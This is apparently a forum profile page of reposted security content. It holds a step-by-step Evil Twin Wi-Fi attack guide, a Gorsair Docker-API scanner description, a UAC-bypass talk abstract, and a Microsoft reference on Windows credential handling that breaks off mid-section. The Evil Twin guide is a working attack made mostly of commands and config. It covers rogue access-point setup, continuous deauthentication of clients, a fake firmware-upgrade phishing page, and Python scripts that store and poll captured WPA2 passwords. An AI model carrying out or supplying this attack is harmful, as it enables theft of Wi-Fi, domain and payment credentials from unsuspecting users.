Everything posted by Nytro
-
Evil Twin Attack: The Definitive Guide
by Hardeep Singh, last updated Feb. 10, 2019

In this article I'll show you how an attacker can automatically retrieve a cleartext WPA2 passphrase using an Evil Twin access point. No cracking is needed, and no extra hardware beyond a wireless adapter. I am using a sample web page for the demonstration; an attacker can turn this page into essentially any web app to steal information such as domain credentials, social login passwords, or credit card numbers.

Evil Twin (noun): a fraudulent wireless access point masquerading as a legitimate AP. An Evil Twin access point's sole purpose is to eavesdrop on WiFi users and steal personal or corporate information without the user's knowledge.

We will not use any automated script. Instead we will understand the concept and perform each step manually, so that you can write your own script to automate the task and make it simple and usable on low-end devices. Let's begin!

Evil Twin Attack Methodology

Step 1: The attacker scans the air for the target access point's information: SSID, channel number, and MAC address. He then uses that information to create an access point with the same characteristics, hence "Evil Twin" attack.
Step 2: Clients on the legitimate AP are repeatedly disconnected, forcing users to connect to the fraudulent access point.
Step 3: As soon as a client connects to the fake access point, they may start browsing the Internet.
Step 4: The client opens a browser window and sees a web administrator warning: "Enter WPA password to download and upgrade the router firmware."
Step 5: The moment the client enters the password, they are redirected to a loading page and the password is stored in the MySQL database on the attacker machine.

Persistent storage and active deauthentication are what make this attack automated. An attacker can also abuse that automation by simply changing the web page: imagine the WPA2 password warning replaced by "Enter domain credentials to access network resources." The fake AP stays up the whole time, storing legitimate credentials persistently. I'll cover that in my Captive Portal guide, where I'll demonstrate how an attacker can harvest domain credentials without the user even opening a web page: just connecting to the WiFi takes the user to our page automatically. The victim could be on Android, iOS, macOS, or a Windows laptop; almost every device is susceptible. For now I'll show you how the attack works with fewer complications.

Prerequisites

Below is the hardware and software used in creating this article. Use any hardware of your choice as long as it supports the software you'll be using.

Hardware used:
- A laptop (4 GB RAM, Intel i5 processor)
- Alfa AWUS036NH 1W wireless adapter
- Huawei 3G WiFi dongle for Internet access in the Kali virtual machine

Software used:
- VMware Workstation/Fusion 2019
- Kali Linux 2019 (attacker)
- airmon-ng, airodump-ng, airbase-ng, and aireplay-ng
- dnsmasq
- iptables
- Apache, MySQL
- Firefox web browser on Ubuntu 16.10 (victim)

Installing required tools

The aircrack-ng suite of tools, Apache, MySQL, and iptables come pre-installed in our Kali Linux virtual machine. We just need to install dnsmasq for IP address allocation to the client.
Install dnsmasq in Kali Linux

Type in terminal:

apt-get update
apt-get install dnsmasq -y

This updates the package cache and installs the latest version of dnsmasq in your Kali Linux box. Now all the required tools are installed. We need to configure Apache and the DHCP server so that the access point will allocate IP addresses to the client/victim and the client can reach our web page. Next we define the IP range and the subnet mask for the DHCP server.

Configure dnsmasq

Create a configuration file for dnsmasq using vim or your favourite text editor and add the following:

sudo vi ~/Desktop/dnsmasq.conf

~/Desktop/dnsmasq.conf:

interface=at0
dhcp-range=10.0.0.10,10.0.0.250,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

Save and exit. Use any name you like for the .conf file.

Pro tip: replace at0 with wlan0 everywhere if you use hostapd to create the access point.

Parameter breakdown:
- dhcp-range=10.0.0.10,10.0.0.250,12h: client IP addresses range from 10.0.0.10 to 10.0.0.250, with a default lease time of 12 hours.
- dhcp-option=3,10.0.0.1: option 3 is the default gateway, followed by its IP address, 10.0.0.1.
- dhcp-option=6,10.0.0.1: option 6 is the DNS server, followed by its IP address.

(Optional) Resolve the airmon-ng and NetworkManager conflict

Before enabling monitor mode on the wireless card, let's fix the airmon-ng/NetworkManager conflict for good, so we no longer need to kill NetworkManager or disconnect any network connection (via airmon-ng check kill) every time we start a WiFi pentest. Open NetworkManager's configuration file and add the MAC address of the device you want NetworkManager to stop managing:

vim /etc/NetworkManager/NetworkManager.conf

Add the following at the end of the file:

[keyfile]
unmanaged-devices=mac:AA:BB:CC:DD:EE:FF;mac:A2:B2:C2:D2:E2:F2

With NetworkManager.conf edited, airmon-ng should no longer conflict with NetworkManager in Kali Linux. We are ready to begin.

Put the wireless adapter into monitor mode

Bring up the wireless interface and enable monitor mode:

ifconfig wlan0 up
airmon-ng start wlan0

Putting the card in monitor mode will show similar output in your terminal. Now our card is in monitor mode without any NetworkManager issues. Start monitoring the air with:

airodump-ng wlan0mon

As soon as your target AP appears in the airodump-ng output window, press CTRL+C and note its three identifiers (SSID, channel, MAC address) in a text editor:

vi info.txt

Set the tx-power of the Alfa card to its maximum: 1000 mW

tx-power stands for transmission power. By default it is set to 20 dBm (decibel-milliwatts), i.e. 100 mW. Power in mW increases tenfold with every additional 10 dBm (see a dBm-to-mW table); if your region was set to US during installation, your card should be able to operate at 30 dBm (1000 mW).

ifconfig wlan0mon down
iw reg set US
ifconfig wlan0mon up
iwconfig wlan0mon

Why do we need to change the region to run the card at 1000 mW? Different countries allow wireless devices to operate only at certain powers and frequencies, and Linux distributions ship this regulatory information, so you need to change your region to allow yourself to operate at that frequency and power. The point of powering up the card is that you don't need to be physically near the victim when creating the hotspot: a victim device will automatically connect to the AP with the higher signal strength, even if that AP isn't physically nearer.
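The dBm-to-mW relationship above is just a logarithmic scale. A quick Python sketch of the conversion (the function name is my own, for illustration):

def dbm_to_mw(dbm):
    """Convert transmission power from dBm to milliwatts.

    Every +10 dBm multiplies the power by 10:
    20 dBm -> 100 mW, 30 dBm -> 1000 mW.
    """
    return 10 ** (dbm / 10.0)

print(dbm_to_mw(20))  # 100.0
print(dbm_to_mw(30))  # 1000.0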
Start the Evil Twin Attack

Begin the Evil Twin attack using airbase-ng:

airbase-ng -e "rootsh3ll" -c 1 wlan0mon

By default airbase-ng creates a tap interface (at0) as the wired interface for bridging/routing the network traffic via the rogue access point. You can see it with the ifconfig at0 command. Before at0 can allocate IP addresses to clients, it needs an IP address of its own.

Allocate IP and subnet mask

ifconfig at0 10.0.0.1 up

Note: the Class A IP address 10.0.0.1 matches the dhcp-option parameter of the dnsmasq.conf file, which means at0 will act as the default gateway under dnsmasq.

Now we will use our default Internet-facing interface, eth0, to route all the traffic from the client through it. In other words, the victim gets to access the Internet while we (the attacker) sniff that traffic. For that we use the iptables utility to set firewall rules that route all traffic through at0 exclusively. You will get similar output if using a VM.

Enable NAT by setting firewall rules in iptables

Enter the following commands to set up the NAT:

iptables --flush
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:80
iptables -t nat -A POSTROUTING -j MASQUERADE

Make sure you enter the correct interface for --out-interface. Here eth0 is the upstream interface where we send out packets coming from the at0 interface (the rogue AP). The rest can stay as shown. If you want to give the victim Internet access after entering the commands above, enable routing as shown below.

Enable IP forwarding

echo 1 > /proc/sys/net/ipv4/ip_forward

Writing "1" to the ip_forward file tells the system to start forwarding traffic (if any) according to the rules defined in iptables; 0 disables forwarding, although the rules remain defined until the next reboot either way. We will leave it at 0 for this attack, since we are not providing Internet access before we get the WPA password.
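Since the article encourages you to script these steps yourself, here is a minimal Python sketch that applies the exact iptables rules above and toggles IP forwarding. The function name is illustrative, not part of any tool mentioned in this article, and it must run as root:

import subprocess

# The exact rules from this section, in order
NAT_RULES = [
    "iptables --flush",
    "iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE",
    "iptables --append FORWARD --in-interface at0 -j ACCEPT",
    "iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:80",
    "iptables -t nat -A POSTROUTING -j MASQUERADE",
]

def setup_nat(enable_forwarding=False):
    for rule in NAT_RULES:
        subprocess.run(rule.split(), check=True)
    # 0 = keep the victim offline until the passphrase is captured
    with open("/proc/sys/net/ipv4/ip_forward", "w") as f:
        f.write("1" if enable_forwarding else "0")

setup_nat(enable_forwarding=False)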
Our Evil Twin attack is now ready and the rules are in place; next we start the DHCP server so the fake AP can allocate IP addresses to clients. First we tell dnsmasq the location of the file we created earlier, which defines the IP class, subnet mask, and range of the network.

Start the dnsmasq listener

Type in terminal:

dnsmasq -C ~/Desktop/dnsmasq.conf -d

Here -C specifies the configuration file and -d runs dnsmasq in no-daemon (debug) mode, keeping it in the foreground. As soon as a victim connects you should see output similar to this:

dnsmasq: started, version 2.76 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt DBus i18n IDN DHCP DHCPv6 no-Lua TFTP conntrack ipset auth DNSSEC loop-detect inotify
dnsmasq-dhcp: DHCP, IP range 10.0.0.10 -- 10.0.0.250, lease time 12h
dnsmasq: using nameserver 8.8.8.8#53
dnsmasq: reading /etc/resolv.conf
dnsmasq: using nameserver 8.8.8.8#53
dnsmasq: using nameserver 192.168.74.2#53
dnsmasq: read /etc/hosts - 5 addresses
dnsmasq-dhcp: 1673205542 available DHCP range: 10.0.0.10 -- 10.0.0.250
dnsmasq-dhcp: 1673205542 client provides name: rootsh3ll-iPhone
dnsmasq-dhcp: 1673205542 DHCPDISCOVER(at0) 2c:33:61:3d:c4:2e
dnsmasq-dhcp: 1673205542 tags: at0
dnsmasq-dhcp: 1673205542 DHCPOFFER(at0) 10.0.0.247 2c:33:61:3a:c4:2f
dnsmasq-dhcp: 1673205542 requested options: 1:netmask, 121:classless-static-route, 3:router,
<-----------------------------------------SNIP----------------------------------------->
dnsmasq-dhcp: 1673205542 available DHCP range: 10.0.0.10 -- 10.0.0.250

If you face any issue with the DHCP server, just kill the currently running DHCP processes and run dnsmasq again; it should work then:

killall dnsmasq dhcpd isc-dhcp-server

Start the services

Now start Apache and MySQL:

/etc/init.d/apache2 start
/etc/init.d/mysql start

We have our Evil Twin attack vector up and working perfectly. Now we need to put our fake web page in place so that the victim sees it while browsing and enters the passphrase they use for their own access point.

Download the rogue AP configuration files:

wget https://cdn.rootsh3ll.com/u/20180724181033/Rogue_AP.zip

and extract them into Apache's html directory:

unzip Rogue_AP.zip -d /var/www/html/

This extracts the contents of the archive into Apache's html directory, so that when the victim opens a browser they are automatically redirected to the default index.html page. To store the credentials entered on that page we need a SQL database. The archive includes a dbconnect.php file for this, but the database it references must already exist for dbconnect.php to record anything. Open a terminal and type:

mysql -u root -p

Create a new user fakeap with password fakeap (since MySQL 5.7 you cannot execute MySQL queries from PHP as the root user):

create user fakeap@localhost identified by 'fakeap';

Now create the database and table as defined in dbconnect.php:

create database rogue_AP;
use rogue_AP;
create table wpa_keys(password1 varchar(32), password2 varchar(32));

Grant fakeap all permissions on the rogue_AP database:

grant all privileges on rogue_AP.* to 'fakeap'@'localhost';

Exit and log in as the new user:

mysql -u fakeap -p

Select the rogue_AP database:

use rogue_AP;

Insert a test value into the table:

insert into wpa_keys(password1, password2) values ("testpass", "testpass");
select * from wpa_keys;

Note that both values are the same here: the password and the confirmation password must match. Our attack is now ready; we just wait for a client to connect and watch the credentials come in.
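To watch for captured passphrases without re-typing the SELECT query, a small polling sketch is shown below. It shells out to the mysql command-line client with the fakeap user created above; the function name and polling interval are my own choices:

import subprocess
import time

QUERY = "SELECT password1, password2 FROM wpa_keys;"

def poll_wpa_keys(interval=10):
    seen = set()
    while True:
        result = subprocess.run(
            ["mysql", "-u", "fakeap", "-pfakeap", "rogue_AP", "-e", QUERY],
            capture_output=True, text=True)
        for row in result.stdout.splitlines()[1:]:  # skip the header line
            if row not in seen:
                seen.add(row)
                print("[+] Captured credentials:", row)
        time.sleep(interval)

poll_wpa_keys()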
In some cases your client might already be connected to the original AP. You need to disconnect the client, as we did in the previous chapters, using the aireplay-ng utility.

Syntax:

aireplay-ng --deauth 0 -a <BSSID> <Interface>
aireplay-ng --deauth 0 -a FC:DD:55:08:4F:C2 wlan0mon

--deauth 0: unlimited deauthentication requests; limit the count by passing a natural number instead. We use 0 so that every client disconnects from that specific BSSID and connects to our AP, which has the same name as the real AP but is an open access point.

As soon as a client connects to your AP you will see activity in the airbase-ng terminal window. To simulate the client side I am using an Ubuntu machine connected via WiFi, with the Firefox web browser illustrating the attack. The victim can now access the Internet. You can do two things at this stage:

1. Sniff the client traffic.
2. Redirect all traffic to the fake AP page, which is what we want to do.

Redirect the client to our fake AP page by running:

dnsspoof -i at0

This redirects all HTTP traffic coming from the at0 interface, but not HTTPS traffic, due to browsers' built-in lists of HSTS websites: you can't redirect HTTPS traffic without triggering an SSL/TLS error on the victim's machine. When the victim tries to access any website (google.com in this case), they see a page telling them to enter the password to download and upgrade the firmware. Here I am entering "iamrootsh3ll" as the password the victim believes is their AP's password. As soon as the victim presses [ENTER], they are shown a loading page.

Now, back on the attacker side, check the MySQL database for the stored passwords: type the previously used SELECT query in the MySQL terminal window and see whether a new row has appeared. After running through the simulation I checked the MySQL DB, and there it was. Voila! You have successfully harvested the WPA2 passphrase, right from the victim, in plain text. Now close all the terminal windows and connect back to the real AP to check whether the password is correct, or whether the "victim" was themselves a hacker who tricked you!

You don't have to name your AP after an existing one, by the way: you can also use a random "free open WiFi"-style name to gather clients on your AP and start pentesting.

Want to go even deeper? If you are serious about WiFi penetration testing and security, there is also the WiFi Hacking in the Cloud video course, which takes you from complete beginner to a blue teamer who can not only pentest a WiFi network but also detect rogue devices and network anomalies, perform threat detection on multiple networks at once, create email reports and visual dashboards, handle incidents, and respond to the Security Operations Center. Its USP: WiFi hacking without a WiFi card, a.k.a. the cloud labs, which let you simply log into your Kali machine and start sniffing WiFi traffic and performing low- and high-level WiFi attacks entirely in your lab. The labs can be accessed in two ways: via browser (using your login link and associated password) or via SSH for a faster, lower-latency experience. The GUI lab runs in a Chrome browser on the Amazon AWS cloud.

Sursa: https://rootsh3ll.com/evil-twin-attack/
-
Gorsair

Gorsair is a penetration testing tool for discovering and remotely accessing Docker APIs from vulnerable Docker containers. Once it has access to the Docker daemon, you can use Gorsair to directly execute commands on remote containers. Exposing the Docker API on the Internet is a tremendous risk, as it can let malicious agents get information on all the other containers, images, and the system, as well as potentially gain privileged access to the whole system if the image uses the root user.

Command line options

-t, --targets: Set targets according to the nmap target format. Required. Example: --targets="192.168.1.72,192.168.1.74"
-p, --ports: (Default: 2375,2376) Set custom ports.
-s, --speed: (Default: 4) Set custom nmap discovery presets to improve speed or accuracy. It's recommended to lower it if you are attempting to scan an unstable or slow network, or to increase it on a very performant and reliable network. You might also want to keep it low to keep your discovery stealthy. See the nmap timing templates for more info.
-v, --verbose: Enable more verbose logs.
-D, --decoys: List of decoy IP addresses to use (see the decoy section of the nmap documentation).
-e, --interface: Network interface to use.
--proxies: List of HTTP/SOCKS4 proxies to relay connections through (see the nmap documentation).
-S, --spoof-ip: IP address to use for IP spoofing.
--spoof-mac: MAC address to use for MAC spoofing.
-h, --help: Display the usage information.

How can I protect my containers from this attack?

Avoid putting containers that have access to the Docker socket on the Internet.
Avoid using the root account in Docker containers.
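As a defensive counterpart, you can check your own hosts for an exposed daemon by querying the documented /version endpoint of the Docker Engine API. A hedged Python sketch (the function name is my own, and port 2376 normally requires TLS client certificates, so an unauthenticated probe there will usually just fail):

import requests

def docker_api_exposed(host, ports=(2375, 2376)):
    """Return True if host answers the Docker Engine API /version endpoint."""
    for port in ports:
        scheme = "https" if port == 2376 else "http"
        url = "%s://%s:%d/version" % (scheme, host, port)
        try:
            info = requests.get(url, timeout=3, verify=False).json()
        except (requests.RequestException, ValueError):
            continue
        if "ApiVersion" in info:
            print("[!] %s exposes Docker %s" % (url, info.get("Version")))
            return True
    return False

docker_api_exposed("192.168.1.72")

Sursa: https://github.com/Ullaakut/Gorsair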
-
ZeroNights
Published Jan. 19, 2018

UAC, specifically Admin-Approval mode, has been known to be broken ever since it was first released in Windows Vista. Most research on bypassing UAC has focused on abusing bad elevated-application behavior, auto-elevation, or shared registry and file resources. However, UAC was fundamentally broken from day one due to the way Microsoft implemented the security around elevated processes, especially their access tokens. This presentation goes into depth on why this technique works, allowing you to silently gain administrator privileges if a single elevated application is running. It describes how Microsoft tried to fix the issue in Windows 10, and how you can circumvent their defences. It also details a previously undocumented technique for abusing the assumed, more secure, Over-The-Shoulder elevation on Windows 10. Slides - https://2017.zeronights.org/wp-conten...
-
Credentials Processes in Windows Authentication
10/12/2016

Applies To: Windows Server (Semi-Annual Channel), Windows Server 2016

This reference topic for the IT professional describes how Windows authentication processes credentials. Windows credentials management is the process by which the operating system receives the credentials from the service or user and secures that information for future presentation to the authenticating target. In the case of a domain-joined computer, the authenticating target is the domain controller. The credentials used in authentication are digital documents that associate the user's identity to some form of proof of authenticity, such as a certificate, a password, or a PIN.

By default, Windows credentials are validated against the Security Accounts Manager (SAM) database on the local computer, or against Active Directory on a domain-joined computer, through the Winlogon service. Credentials are collected through user input on the logon user interface or programmatically via the application programming interface (API) to be presented to the authenticating target.

Local security information is stored in the registry under HKEY_LOCAL_MACHINE\SECURITY. Stored information includes policy settings, default security values, and account information, such as cached logon credentials. A copy of the SAM database is also stored here, although it is write-protected.

The following diagram shows the components that are required and the paths that credentials take through the system to authenticate the user or process for a successful logon. The following table describes each component that manages credentials in the authentication process at the point of logon.

Authentication components for all systems:

- User logon: Winlogon.exe is the executable file responsible for managing secure user interactions. The Winlogon service initiates the logon process for Windows operating systems by passing the credentials collected by user action on the secure desktop (Logon UI) to the Local Security Authority (LSA) through Secur32.dll.
- Application logon: Application or service logons that do not require interactive logon. Most processes initiated by the user run in user mode by using Secur32.dll, whereas processes initiated at startup, such as services, run in kernel mode by using Ksecdd.sys. For more information about user mode and kernel mode, see Applications and User Mode or Services and Kernel Mode in this topic.
- Secur32.dll: The multiple authentication providers that form the foundation of the authentication process.
- Lsasrv.dll: The LSA Server service, which both enforces security policies and acts as the security package manager for the LSA. The LSA contains the Negotiate function, which selects either the NTLM or Kerberos protocol after determining which protocol is to be successful.
- Security Support Providers: A set of providers that can individually invoke one or more authentication protocols. The default set of providers can change with each version of the Windows operating system, and custom providers can be written.
- Netlogon.dll: The services that the Net Logon service performs are as follows:
  - Maintains the computer's secure channel (not to be confused with Schannel) to a domain controller.
  - Passes the user's credentials through a secure channel to the domain controller and returns the domain security identifiers (SIDs) and user rights for the user.
  - Publishes service resource records in the Domain Name System (DNS) and uses DNS to resolve names to the Internet Protocol (IP) addresses of domain controllers.
  - Implements the replication protocol based on remote procedure call (RPC) for synchronizing primary domain controllers (PDCs) and backup domain controllers (BDCs).
- Samsrv.dll: The Security Accounts Manager (SAM), which stores local security accounts, enforces locally stored policies, and supports APIs.
- Registry: The Registry contains a copy of the SAM database, local security policy settings, default security values, and account information that is only accessible to the system.

This topic contains the following sections:

- Credential input for user logon
- Credential input for application and service logon
- Local Security Authority
- Cached credentials and validation
- Credential storage and validation
- Security Accounts Manager database
- Local domains and trusted domains
- Certificates in Windows authentication

Credential input for user logon

In Windows Server 2008 and Windows Vista, the Graphical Identification and Authentication (GINA) architecture was replaced with a credential provider model, which made it possible to enumerate different logon types through the use of logon tiles. Both models are described below.

Graphical Identification and Authentication architecture

The Graphical Identification and Authentication (GINA) architecture applies to the Windows Server 2003, Microsoft Windows 2000 Server, Windows XP, and Windows 2000 Professional operating systems. In these systems, every interactive logon session creates a separate instance of the Winlogon service. The GINA architecture is loaded into the process space used by Winlogon, receives and processes the credentials, and makes the calls to the authentication interfaces through LSALogonUser. The instances of Winlogon for an interactive logon run in Session 0. Session 0 hosts system services and other critical processes, including the Local Security Authority (LSA) process. The following diagram shows the credential process for Windows Server 2003, Microsoft Windows 2000 Server, Windows XP, and Microsoft Windows 2000 Professional.

Credential provider architecture

The credential provider architecture applies to those versions designated in the Applies To list at the beginning of this topic. In these systems, the credentials input architecture changed to an extensible design by using credential providers. These providers are represented by the different logon tiles on the secure desktop that permit any number of logon scenarios: different accounts for the same user and different authentication methods, such as password, smart card, and biometrics.

With the credential provider architecture, Winlogon always starts Logon UI after it receives a secure attention sequence event. Logon UI queries each credential provider for the number of different credential types the provider is configured to enumerate. Credential providers have the option of specifying one of these tiles as the default. After all providers have enumerated their tiles, Logon UI displays them to the user. The user interacts with a tile to supply their credentials. Logon UI submits these credentials for authentication.

Credential providers are not enforcement mechanisms. They are used to gather and serialize credentials. The Local Security Authority and authentication packages enforce security.
Credential providers are registered on the computer and are responsible for the following:

- Describing the credential information required for authentication.
- Handling communication and logic with external authentication authorities.
- Packaging credentials for interactive and network logon.

Packaging credentials for interactive and network logon includes the process of serialization. By serializing credentials, multiple logon tiles can be displayed on the logon UI. Therefore, your organization can control the logon display (users, target systems for logon, pre-logon access to the network, and workstation lock/unlock policies) through the use of customized credential providers. Multiple credential providers can co-exist on the same computer.

Single sign-on (SSO) providers can be developed as a standard credential provider or as a Pre-Logon-Access Provider. Each version of Windows contains one default credential provider and one default Pre-Logon-Access Provider (PLAP), also known as the SSO provider. The SSO provider permits users to make a connection to a network before logging on to the local computer. When this provider is implemented, the provider does not enumerate tiles on Logon UI.

An SSO provider is intended to be used in the following scenarios:

- Network authentication and computer logon are handled by different credential providers. Variations to this scenario include:
  - A user has the option of connecting to a network, such as a virtual private network (VPN), before logging on to the computer but is not required to make this connection.
  - Network authentication is required to retrieve information used during interactive authentication on the local computer.
  - Multiple network authentications are followed by one of the other scenarios. For example, a user authenticates to an Internet service provider (ISP), authenticates to a VPN, and then uses their user account credentials to log on locally.
  - Cached credentials are disabled, and a Remote Access Services connection through VPN is required before local logon to authenticate the user.
  - A domain user does not have a local account set up on a domain-joined computer and must establish a Remote Access Services connection through VPN before completing interactive logon.
- Network authentication and computer logon are handled by the same credential provider. In this scenario, the user is required to connect to the network before logging on to the computer.

Logon tile enumeration

For the operating systems designated in the Applies To list at the beginning of this topic, the credential provider enumerates logon tiles in the following instances:

- The credential provider enumerates the tiles for workstation logon. The credential provider typically serializes credentials for authentication to the local security authority. This process displays tiles specific to each user and to each user's target systems.
- The logon and authentication architecture lets a user use tiles enumerated by the credential provider to unlock a workstation. Typically, the currently logged-on user is the default tile, but if more than one user is logged on, numerous tiles are displayed.
- The credential provider enumerates tiles in response to a user request to change their password or other private information, such as a PIN. Typically, the currently logged-on user is the default tile; however, if more than one user is logged on, numerous tiles are displayed.
- The credential provider enumerates tiles based on the serialized credentials to be used for authentication on remote computers. Credential UI does not use the same instance of the provider as the Logon UI, Unlock Workstation, or Change Password flows, so state information cannot be maintained in the provider between instances of Credential UI. This structure results in one tile for each remote computer logon, assuming the credentials have been correctly serialized. This scenario is also used in User Account Control (UAC), which can help prevent unauthorized changes to a computer by prompting the user for permission or an administrator password before permitting actions that could potentially affect the computer's operation or that could change settings that affect other users of the computer.

The following diagram shows the credential process for the operating systems designated in the Applies To list at the beginning of this topic.

Credential input for application and service logon

Windows authentication is designed to manage credentials for applications or services that do not require user interaction. Applications in user mode are limited in terms of what system resources they have access to, while services can have unrestricted access to the system memory and external devices.

System services and transport-level applications access a Security Support Provider (SSP) through the Security Support Provider Interface (SSPI) in Windows, which provides functions for enumerating the security packages available on a system, selecting a package, and using that package to obtain an authenticated connection.

When a client/server connection is authenticated:

- The application on the client side of the connection sends credentials to the server by using the SSPI function InitializeSecurityContext (General).
- The application on the server side of the connection responds with the SSPI function AcceptSecurityContext (General).
- The SSPI functions InitializeSecurityContext (General) and AcceptSecurityContext (General) are repeated until all the necessary authentication messages have been exchanged and authentication either succeeds or fails.
- After the connection has been authenticated, the LSA on the server uses information from the client to build the security context, which contains an access token.
- The server can then call the SSPI function ImpersonateSecurityContext to attach the access token to an impersonation thread for the service.

Applications and user mode

User mode in Windows is composed of two systems capable of passing I/O requests to the appropriate kernel-mode drivers: the environment system, which runs applications written for many different types of operating systems, and the integral system, which manages operating system-specific functions on behalf of the environment system and consists of a security system process (the LSA), a workstation service, and a server service.

The security system process deals with security tokens, grants or denies permissions to access user accounts based on resource permissions, handles logon requests and initiates logon authentication, and determines which system resources the operating system needs to audit.

Applications can run in user mode where the application can run as any principal, including in the security context of Local System (SYSTEM). Applications can also run in kernel mode where the application can run in the security context of Local System (SYSTEM).
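The InitializeSecurityContext/AcceptSecurityContext loop described above can be exercised from Python via pywin32's sspi wrapper. A minimal loopback sketch, assuming pywin32 is installed on a Windows machine (both sides of an NTLM handshake run in one process purely for illustration):

import sspi  # pywin32 wrapper over Secur32.dll / SSPI

client = sspi.ClientAuth("NTLM")
server = sspi.ServerAuth("NTLM")

sec_buffer = None
while True:
    err, sec_buffer = client.authorize(sec_buffer)   # InitializeSecurityContext
    err, sec_buffer = server.authorize(sec_buffer)   # AcceptSecurityContext
    if err == 0:  # SEC_E_OK: all authentication messages exchanged
        break
print("Authenticated")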
SSPI is available through the Secur32.dll module, which is an API used for obtaining integrated security services for authentication, message integrity, and message privacy. It provides an abstraction layer between application-level protocols and security protocols. Because different applications require different ways of identifying or authenticating users and different ways of encrypting data as it travels across a network, SSPI provides a way to access dynamic-link libraries (DLLs) that contain different authentication and cryptographic functions. These DLLs are called Security Support Providers (SSPs). Managed service accounts and virtual accounts were introduced in Windows Server 2008 R2 and Windows 7 to provide crucial applications, such as Microsoft SQL Server and Internet Information Services (IIS), with the isolation of their own domain accounts, while eliminating the need for an administrator to manually administer the service principal name (SPN) and credentials for these accounts. For more information about these features and their role in authentication, see Managed Service Accounts Documentation for Windows 7 and Windows Server 2008 R2 and Group Managed Service Accounts Overview. Services and kernel mode Even though most Windows applications run in the security context of the user who starts them, this is not true of services. Many Windows services, such as network and printing services, are started by the service controller when the user starts the computer. These services might run as Local Service or Local System and might continue to run after the last human user logs off. Note Services normally run in security contexts known as Local System (SYSTEM), Network Service, or Local Service. Windows Server 2008 R2 introduced services that run under a managed service account, which are domain principals. Before starting a service, the service controller logs on by using the account that is designated for the service, and then presents the service's credentials for authentication by the LSA. The Windows service implements a programmatic interface that the service controller manager can use to control the service. A Windows service can be started automatically when the system is started or manually with a service control program. For example, when a Windows client computer joins a domain, the messenger service on the computer connects to a domain controller and opens a secure channel to it. To obtain an authenticated connection, the service must have credentials that the remote computer's Local Security Authority (LSA) trusts. When communicating with other computers in the network, LSA uses the credentials for the local computer's domain account, as do all other services running in the security context of the Local System and Network Service. Services on the local computer run as SYSTEM so credentials do not need to be presented to the LSA. The file Ksecdd.sys manages and encrypts these credentials and uses a local procedure call into the LSA. The file type is DRV (driver) and is known as the kernel-mode Security Support Provider (SSP) and, in those versions designated in the Applies To list at the beginning of this topic, is FIPS 140-2 Level 1-compliant. Kernel mode has full access to the hardware and system resources of the computer. The kernel mode stops user-mode services and applications from accessing critical areas of the operating system that they should not have access to. 
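To see which SSPs/security packages a given system actually exposes, pywin32 also wraps the enumeration function mentioned in the SSPI discussion above. A sketch, assuming pywin32 and that each returned entry carries Name and Comment fields:

import win32security  # pywin32

# Wraps the SSPI package-enumeration call; each entry describes one SSP
# (NTLM, Kerberos, Negotiate, Schannel, ...)
for pkg in win32security.EnumerateSecurityPackages():
    print(pkg["Name"], "-", pkg["Comment"])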
Local Security Authority

The Local Security Authority (LSA) is a protected system process that authenticates and logs users on to the local computer. In addition, LSA maintains information about all aspects of local security on a computer (these aspects are collectively known as the local security policy), and it provides various services for translation between names and security identifiers (SIDs). The security system process, Local Security Authority Server Service (LSASS), keeps track of the security policies and the accounts that are in effect on a computer system.

The LSA validates a user's identity based on which of the following two entities issued the user's account:

- Local Security Authority. The LSA can validate user information by checking the Security Accounts Manager (SAM) database located on the same computer. Any workstation or member server can store local user accounts and information about local groups. However, these accounts can be used for accessing only that workstation or computer.
- Security authority for the local domain or for a trusted domain. The LSA contacts the entity that issued the account and requests verification that the account is valid and that the request originated from the account holder.

The Local Security Authority Subsystem Service (LSASS) stores credentials in memory on behalf of users with active Windows sessions. The stored credentials let users seamlessly access network resources, such as file shares, Exchange Server mailboxes, and SharePoint sites, without re-entering their credentials for each remote service. LSASS can store credentials in multiple forms, including:

- Reversibly encrypted plaintext
- Kerberos tickets (ticket-granting tickets (TGTs), service tickets)
- NT hash
- LAN Manager (LM) hash

If the user logs on to Windows by using a smart card, LSASS does not store a plaintext password, but it stores the corresponding NT hash value for the account and the plaintext PIN for the smart card. If the account attribute is enabled for a smart card that is required for interactive logon, a random NT hash value is automatically generated for the account instead of the original password hash. The password hash that is automatically generated when the attribute is set does not change.

If a user logs on to a Windows-based computer with a password that is compatible with LAN Manager (LM) hashes, this authenticator is present in memory. The storage of plaintext credentials in memory cannot be disabled, even if the credential providers that require them are disabled.

The stored credentials are directly associated with the Local Security Authority Subsystem Service (LSASS) logon sessions that have been started after the last restart and have not been closed. For example, LSA sessions with stored LSA credentials are created when a user does any of the following:

- Logs on to a local session or Remote Desktop Protocol (RDP) session on the computer
- Runs a task by using the RunAs option
- Runs an active Windows service on the computer
- Runs a scheduled task or batch job
- Runs a task on the local computer by using a remote administration tool

In some circumstances, the LSA secrets, which are secret pieces of data that are accessible only to SYSTEM account processes, are stored on the hard disk drive. Some of these secrets are credentials that must persist after reboot, and they are stored in encrypted form on the hard disk drive.
Credentials stored as LSA secrets might include:

- Account password for the computer's Active Directory Domain Services (AD DS) account
- Account passwords for Windows services that are configured on the computer
- Account passwords for configured scheduled tasks
- Account passwords for IIS application pools and websites
- Passwords for Microsoft accounts

Introduced in Windows 8.1, the client operating system provides additional protection for the LSA to prevent reading memory and code injection by non-protected processes. This protection increases security for the credentials that the LSA stores and manages. For more information about these additional protections, see Configuring Additional LSA Protection.

Cached credentials and validation

Validation mechanisms rely on the presentation of credentials at the time of logon. However, when the computer is disconnected from a domain controller and the user is presenting domain credentials, Windows uses the process of cached credentials in the validation mechanism. Each time a user logs on to a domain, Windows caches the credentials supplied and stores them in the security hive in the registry of the operating system. With cached credentials, the user can log on to a domain member without being connected to a domain controller within that domain.

Credential storage and validation

It is not always desirable to use one set of credentials for access to different resources. For example, an administrator might want to use administrative rather than user credentials when accessing a remote server. Similarly, if a user accesses external resources, such as a bank account, he or she can only use credentials that are different from their domain credentials. The following sections describe the differences in credential management between current versions of Windows operating systems and the Windows Vista and Windows XP operating systems.

Remote logon credential processes

